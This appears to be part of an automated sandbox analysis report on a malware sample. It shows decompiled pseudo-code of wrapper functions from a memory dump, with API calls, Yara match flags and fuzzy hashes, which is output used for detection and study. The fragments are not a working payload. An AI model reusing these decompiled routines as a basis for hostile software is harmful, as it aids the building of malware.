				_pop(_t9);
				asm("lock loope 0x73");
				asm("out 0x55, eax");
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t12, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00419e8a
0x00419e8b
0x00419e8f
0x00419e93
0x00419e96
0x00419e9f
0x00419ea7
0x00419eb5
0x00419eb9

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: b898b10ed37f73ee457b4ee55b743b243c52ee174a8fa96423fcc5a3cae97736
Instruction ID: 58703a99195d55ca86410b247c4f7bed8e39fca0326c1b5473da2249cf414dbc
Opcode Fuzzy Hash: b898b10ed37f73ee457b4ee55b743b243c52ee174a8fa96423fcc5a3cae97736
Instruction Fuzzy Hash: 02E086751002187BD724DB94CC85EE77B5CEF48B60F15445ABA1C9BA41D530F94086D0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00419e93
0x00419e96
0x00419e9f
0x00419ea7
0x00419eb5
0x00419eb9

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0

Uniqueness

Uniqueness Score: -1.00%

Function 018599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018599AA

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a72fae2cf5629e6ea9d02c05b4e34bd541cf388a84eab9cfcfd3c152adb781f5
Instruction ID: 3971a9c8e8e0d1019c8af14124f5f7c02fd454c6ba8139cd66e328d2e7ae7b42
Opcode Fuzzy Hash: a72fae2cf5629e6ea9d02c05b4e34bd541cf388a84eab9cfcfd3c152adb781f5
Instruction Fuzzy Hash: 1A9002A134100842D100619A5414B060009E7E1341F51C115E2458664DCA59CD567166

Uniqueness

Uniqueness Score: -1.00%

Function 018595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018595DA

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1909460e2b49319dc9f662b27d738e552444c69e8f7db779f4a3b5a43443d0eb
Instruction ID: 8f60cdb85791b8396409e7efe79612035d0f28d9ab4a833481f6002cc8a8868b
Opcode Fuzzy Hash: 1909460e2b49319dc9f662b27d738e552444c69e8f7db779f4a3b5a43443d0eb
Instruction Fuzzy Hash: 049002A1302004034105719A5414616400EA7E0341B51C121E24086A0DC96589957165

Uniqueness

Uniqueness Score: -1.00%

Function 01859910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0185991A

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a0780088e43a25e33a11171fd103c8e0383922fa3e3c6111982750585e1f29f8
Instruction ID: 9deacd4a81220e0f21683d8c2ab65d8c25fcd74b16716de34d8cf7a4cff5ea4d
Opcode Fuzzy Hash: a0780088e43a25e33a11171fd103c8e0383922fa3e3c6111982750585e1f29f8
Instruction Fuzzy Hash: 979002B130100802D140719A54047460009A7D0341F51C111A6458664ECA998ED976A5

Uniqueness

Uniqueness Score: -1.00%

Function 01859540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0185954A

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fe0f03a5d254608e650b693ca483b285db309ede9711e3e39bd31f9d23b5bc38
Instruction ID: 4cdd848371d471c19802b6b83899263003dc7b5fef0dd35154a87ba367965914
Opcode Fuzzy Hash: fe0f03a5d254608e650b693ca483b285db309ede9711e3e39bd31f9d23b5bc38
Instruction Fuzzy Hash: 24900265311004030105A59A1704507004AA7D5391351C121F2409660CDA6189656161

Uniqueness

Uniqueness Score: -1.00%

Function 018598F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018598FA

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f7cb2745b1bab71be3d4a3d5cff8da73ec805df1e8eeb32a6d87277ac79228fa
Instruction ID: d2a3ddbe9c3bce46bf945a7a03c4fd1f5cd51fd7b1262b6172487ae8643f8f8b
Opcode Fuzzy Hash: f7cb2745b1bab71be3d4a3d5cff8da73ec805df1e8eeb32a6d87277ac79228fa
Instruction Fuzzy Hash: 9190026170100902D101719A5404616000EA7D0381F91C122A2418665ECE658A96B171

Uniqueness

Uniqueness Score: -1.00%

Function 01859840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0185984A

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b4b8d95d697c4d5e700a4cb3327a1c16fd6b39b58deee5be01ea9815c56a86d
Instruction ID: 2934f53ff91fc4aea11a7d4a037c2e429c493c7899fba87123f0d500b194d23a
Opcode Fuzzy Hash: 8b4b8d95d697c4d5e700a4cb3327a1c16fd6b39b58deee5be01ea9815c56a86d
Instruction Fuzzy Hash: FB900261342045525545B19A5404507400AB7E0381791C112A2808A60CC966995AE661

Uniqueness

Uniqueness Score: -1.00%

Function 01859860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0185986A

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 02a59c0917c82e2a15d949c4002b447f39ba4805a00259044e94dec890fe3e06
Instruction ID: edf0160aa1e804e4bdf068919497ae0a4cbdc087d681e3a7b41a7a7687a1488b
Opcode Fuzzy Hash: 02a59c0917c82e2a15d949c4002b447f39ba4805a00259044e94dec890fe3e06
Instruction Fuzzy Hash: 9590027130100813D111619A5504707000DA7D0381F91C512A1818668DDA968A56B161

Uniqueness

Uniqueness Score: -1.00%

Function 01859780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0185978A

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a5cd0b27cb549ff73ce968bcd7042f090a7175c29b1fbb66f1ebd04e978feabe
Instruction ID: 934f3ea21925c21cd65e28abfc5793b33be3383785cf91f86c55bde42b2fd74e
Opcode Fuzzy Hash: a5cd0b27cb549ff73ce968bcd7042f090a7175c29b1fbb66f1ebd04e978feabe
Instruction Fuzzy Hash: E990026931300402D180719A640860A0009A7D1342F91D515A1409668CCD55896D6361

Uniqueness

Uniqueness Score: -1.00%

Function 018597A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018597AA

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c848c288b4ded8cc075ab4977deca5654f6368e1e97637fcb83d8507d0475c5c
Instruction ID: ad822fe9debeda23f49b30147b7f2296584d1d987c4d0ea535d20e30f10d25d5
Opcode Fuzzy Hash: c848c288b4ded8cc075ab4977deca5654f6368e1e97637fcb83d8507d0475c5c
Instruction Fuzzy Hash: 4390026130100403D140719A64186064009F7E1341F51D111E1808664CDD55895A6262

Uniqueness

Uniqueness Score: -1.00%

Function 01859710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0185971A

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4e609f3894b33421e10bce0fa9d9ada69a628f309a3d0ec36a6d1f6086f5ca1e
Instruction ID: 24909ec05bee3808c317aa487b360994de63e85e762500ba2479baf62bb1f54a
Opcode Fuzzy Hash: 4e609f3894b33421e10bce0fa9d9ada69a628f309a3d0ec36a6d1f6086f5ca1e
Instruction Fuzzy Hash: 5090027130100802D10065DA64086460009A7E0341F51D111A6418665ECAA589957171

Uniqueness

Uniqueness Score: -1.00%

Function 018596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018596EA

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ffaf7f98b05cb3f740cfe3ffc692e29feaaefee1ab7d0d40e81f6890deac3780
Instruction ID: 098d3583405d87af116b680735c0ead4ff3c6096c92c7a3bb149fdb365730e05
Opcode Fuzzy Hash: ffaf7f98b05cb3f740cfe3ffc692e29feaaefee1ab7d0d40e81f6890deac3780
Instruction Fuzzy Hash: 4590027130108C02D110619A940474A0009A7D0341F55C511A5818768DCAD589957161

Uniqueness

Uniqueness Score: -1.00%

Function 01859A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01859A0A

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e9bbd0305613ed7563ce5d23d7dc394f72c07a0f39dc1a739cf1efb808bb3310
Instruction ID: 819821b47e79686479eef562f1cbd0339b1f0dea64d9c2bca4cd2ee6eb1941db
Opcode Fuzzy Hash: e9bbd0305613ed7563ce5d23d7dc394f72c07a0f39dc1a739cf1efb808bb3310
Instruction Fuzzy Hash: BF90027130140802D100619A581470B0009A7D0342F51C111A2558665DCA65895575B1

Uniqueness

Uniqueness Score: -1.00%

Function 01859A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01859A2A

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b0aaacafdb8f04f9dfe79f9560150d184ba0438cc42e530ddd785c38970e074d
Instruction ID: 8c2b3a454a6fda0ba4119a51b7668171ad37651398e837aec56818dea7634067
Opcode Fuzzy Hash: b0aaacafdb8f04f9dfe79f9560150d184ba0438cc42e530ddd785c38970e074d
Instruction Fuzzy Hash: A090026170100442414071AA98449064009BBE1351751C221A1D8C660DC999896966A5

Uniqueness

Uniqueness Score: -1.00%

Function 01859A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01859A5A

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 37c7850b36726f67ce59598de7631290fc8aa2e95ce6e36ef68fa76934b09836
Instruction ID: c8594d06536d95bd826af9f3fcc93840fc1254963cdf658edad79d9a23ebba48
Opcode Fuzzy Hash: 37c7850b36726f67ce59598de7631290fc8aa2e95ce6e36ef68fa76934b09836
Instruction Fuzzy Hash: 7690026131180442D20065AA5C14B070009A7D0343F51C215A1548664CCD5589656561

Uniqueness

Uniqueness Score: -1.00%

Function 01859660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0185966A

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e388ffe1d5fa935a227e23b53baf71de7a891f919646075f7e671dbe497f0a64
Instruction ID: 2706d9424c9ef4b27fe3e1d791e0e8666555fb94038238b37a18841f01907427
Opcode Fuzzy Hash: e388ffe1d5fa935a227e23b53baf71de7a891f919646075f7e671dbe497f0a64
Instruction Fuzzy Hash: 2E90027130100C02D180719A540464A0009A7D1341F91C115A1419764DCE558B5D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004082EA, Relevance: 1.6, APIs: 1, Instructions: 56
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004082EA(void* __eax, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t14;
				int _t15;
				long _t22;
				int _t27;
				void* _t30;
				void* _t32;
				void* _t37;

				asm("fcomp qword [edx-0x74aa1603]");
				_t30 = _t32;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t14 = E0040ACD0(_t37, _a4 + 0x1c,  &_v68); // executed
				_t15 = E00414E20(_a4 + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
				_t27 = _t15;
				if(_t27 != 0) {
					_t22 = _a8;
					_t15 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						_t15 =  *_t27(_t22, 0x8003, _t30 + (E0040A460(1, 8) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}

0x004082ec
0x004082f1
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834e
0x0040836b
0x0040836b
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 4e23822c86d86cfc0aa2f1c10c15cb23370e4a3e39196690550920d5949fe68c
Instruction ID: cfa00a07b1aa70c4f127d76168ec66dfc5b8fa0f0f423e136a247d81e356ac5a
Opcode Fuzzy Hash: 4e23822c86d86cfc0aa2f1c10c15cb23370e4a3e39196690550920d5949fe68c
Instruction Fuzzy Hash: E4014031A402187AE72066558C43FFE772CAB40F55F04401DFF04B91C1D6B8290647E9

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x004082f0
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0A4, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0041A0A4(void* __eax, void* __edx, intOrPtr* _a4, int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
				intOrPtr* _t20;
				intOrPtr _t22;
				char _t27;
				void* _t33;

				_t27 = __edx - 1;
				if(_t27 == 0) {
					_t20 = __eax - 0xc4a30c76;
					asm("loope 0x81");
					if(_t20 > 0) {
						_t20 = _a4;
						_t22 =  *((intOrPtr*)(_t20 + 0xa14));
					}
					 *((char*)(_t27 + _t22)) = _t27;
					 *_t20 =  *_t20 + _t20;
					_push(_t34);
					_t34 = _t20 + 0xc7c;
					E0041A960(_t33, _t20, _t20 + 0xc7c, _t22, 0, 0x36);
					ExitProcess(_a12);
				}
				asm("les edx, [edx+edx*2]");
				return  *((intOrPtr*)( *_t34))(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _t22, __eax);
			}

0x0041a0a4
0x0041a0a5
0x0041a0a7
0x0041a0ac
0x0041a0ae
0x0041a0b3
0x0041a0b6
0x0041a0b6
0x0041a0b7
0x0041a0ba
0x0041a0bc
0x0041a0c2
0x0041a0ca
0x0041a0d8
0x0041a0d8
0x0041a109
0x0041a138

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8

Memory Dump Source

Source File: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 76d52d06a02a09366433456c448a014b5b17165752531a60b9cb123cfe6be029
Instruction ID: 613cfd4b8a205081ac7a2eb5e1428e672729e9bde2f84031fe04dfb314773708
Opcode Fuzzy Hash: 76d52d06a02a09366433456c448a014b5b17165752531a60b9cb123cfe6be029
Instruction Fuzzy Hash: 660129B1205109AFCB24DF98DC80DEB77A9AF8C710F158249BA4CA7201D634ED558BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A069, Relevance: 1.5, APIs: 1, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E0041A069(void* __ecx, void* __edx, void* __edi, long _a4, void* _a8) {
				void* _v0;
				intOrPtr _v4;
				char _t11;

				asm("sahf");
				_push(__edi);
				asm("int1");
				_push(_t23);
				_t8 = _v4;
				_t4 = _t8 + 0xc74; // 0xc74
				E0041A960(__edi, _v4, _t4,  *((intOrPtr*)(_v4 + 0x10)), 0, 0x35);
				_t11 = RtlFreeHeap(_v0, _a4, _a8); // executed
				return _t11;
			}

0x0041a069
0x0041a06d
0x0041a06e
0x0041a070
0x0041a073
0x0041a07f
0x0041a087
0x0041a09d
0x0041a0a1

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 3e811a33a3b65c7b9a9e3b25a06fa4e4141f9cdacb4c54195455881a6481665d
Instruction ID: 7c635586a7735a4f22b24a2a5efc92f724fdd51c2c95f9ab9e21ae08a81323c1
Opcode Fuzzy Hash: 3e811a33a3b65c7b9a9e3b25a06fa4e4141f9cdacb4c54195455881a6481665d
Instruction Fuzzy Hash: 42E0EDB12102046BD714DF55CC85EE777ADEF89660F058559B94857642C630E9548BB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a07f
0x0041a087
0x0041a09d
0x0041a0a1

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a047
0x0041a05d
0x0041a061

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D

Memory Dump Source

Source File: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a1ea
0x0041a200
0x0041a204

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A0B0(intOrPtr* _a4, int _a8) {
				intOrPtr* _t6;
				intOrPtr _t9;
				char _t10;
				void* _t12;

				_t6 = _a4;
				_t9 =  *((intOrPtr*)(_t6 + 0xa14));
				 *((char*)(_t10 + _t9)) = _t10;
				 *_t6 =  *_t6 + _t6;
				E0041A960(_t12, _t6, _t6 + 0xc7c, _t9, 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a0b3
0x0041a0b6
0x0041a0b7
0x0041a0ba
0x0041a0ca
0x0041a0d8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8

Memory Dump Source

Source File: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0185967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01859694

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e5b5cb05e50a4b13f49cc7f13d700179e35d34dd08b990058ba7079844aef3c6
Instruction ID: 5a06d2d49a53d37da72e0fbb1dd477ab28fa54f2f07ea97c5b56430d3a854fda
Opcode Fuzzy Hash: e5b5cb05e50a4b13f49cc7f13d700179e35d34dd08b990058ba7079844aef3c6
Instruction Fuzzy Hash: 43B02B71D010C5C5D701D3A006087173940B7C0300F13C011D2024340F4738C184F1B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 018CB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** then kb to get the faulting stack, xrefs: 018CB51C
The instruction at %p referenced memory at %p., xrefs: 018CB432
*** enter .cxr %p for the context, xrefs: 018CB50D
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 018CB314
